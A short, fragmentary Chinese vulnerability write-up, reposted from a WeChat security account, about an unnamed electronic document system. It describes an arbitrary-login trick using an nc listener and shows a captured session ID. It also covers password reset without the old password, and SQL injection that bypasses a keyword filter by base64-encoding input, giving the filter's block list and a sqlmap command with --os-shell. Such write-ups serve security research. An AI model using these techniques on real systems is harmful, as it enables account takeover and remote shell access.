免责声明:
0x01 漏洞分析
1、任意用户登录
让returnValue 1
服务开启nc -lvvp 54335
回复一个1
即可拿到session
拿到
JSESSIONID=B63951930136E4CDD4C5ADD6AF3244B5
2、任意密码重置
所以传参要这样传入 key1==value1?key2==value2
这里不用校验旧密码即可新密码。密码必须是md5(明文).upper() md5的大写!
为什么说密码是MD5(明文)大写?
他们所用的库生成就是大写的。
3、SQL注入
参数要求是base64后的传入,这样刚刚好绕过了全局SQL注入的过滤。
waitfor|delay|script|'|exec|insert|select|delete|update|alter|drop|exists|master.|restore|count|%|chr|mid|master|truncate|char|declare|rename|--|or|xp_cmdshell|../..|
py sqlmap.py -r sqli.txt --proxy="http://127.0.0.1:8080" --tamper base64encode.py --force-ssl --os-shell
具体payload这里可能不太方便放,可以试着跟踪下。
0x02
原文始发于微信公众号(小黑说安全):某电子文档系统漏洞分析
原文始发于微信公众号(小黑说安全):某电子文档系统漏洞分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论